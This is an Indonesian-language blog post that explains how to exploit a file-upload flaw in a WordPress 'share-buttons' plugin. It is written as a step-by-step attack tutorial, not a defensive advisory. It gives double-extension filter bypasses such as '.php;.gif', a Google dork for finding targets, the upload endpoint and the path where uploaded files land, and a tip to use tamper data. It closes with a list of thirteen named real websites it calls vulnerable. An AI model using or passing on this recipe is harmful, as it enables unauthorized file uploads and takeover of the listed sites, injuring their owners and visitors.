Skip to content

Wordpress Share-Buttons Vulnerbility File Upload


Wordpress Share-Button adalah salah satu celah dimana kita bisa men upload file yang sudah di filter sebelumnya dengan cara menipulasi extensinya sebagai berikut 


  • Vulnerbility Ext : .php;.gif - .asp;.png - .shtml.fla;.jpeg
  • Google Dork : inurl:''/wp-content/plugins/share-buttons/''
  • Admin Panel Path : /wp-login.php
  • Directory File Path : /wp-content/plugins/share-buttons/upload/uploads/[filename]-[nomor-random].png 

Tutorial

Copy google dork di atas atau kembangkan agar mendapatkan lebih banyak site, masukkan exploit berikut /wp-content/plugins/share-buttons/upload/index.php

Vuln? 





Note: Upload file kalian, dengan extensi yang sudah di modifikasi atau ext jpg dengan tamper data


Vulnerbility Sites:


  • russia.starchildglobal.com/wp-content/plugins/share-buttons/upload/index.php
  • viatec.md/wp-content/plugins/share-buttons/upload/index.php
  • outfund.ru/wp-content/plugins/share-buttons/upload/index.php
  • cnho.ru/wp-content/plugins/share-buttons/upload/index.php
  • like-tv.tv/wp-content/plugins/share-buttons/upload/index.php
  • eparhia-tmb.ru/wp-content/plugins/share-buttons/upload/index.php
  • unost.org/wp-content/plugins/share-buttons/upload/index.php
  • hww.ru/wp/wp-content/plugins/share-buttons/upload/index.php
  • daode.com.ua/wp-content/plugins/share-buttons/upload/index.php
  • udacha.pro/wp-content/plugins/share-buttons/upload/index.php
  • brukioptom.com.ua/wp-content/plugins/share-buttons/upload/index.php
  • poddelki.net/wp-content/plugins/share-buttons/upload/index.php
  • spblago.ru/wp-content/plugins/share-buttons/upload/index.php




Wordpress Share-Buttons Vulnerbility File Upload

0 Comments

Post a Comment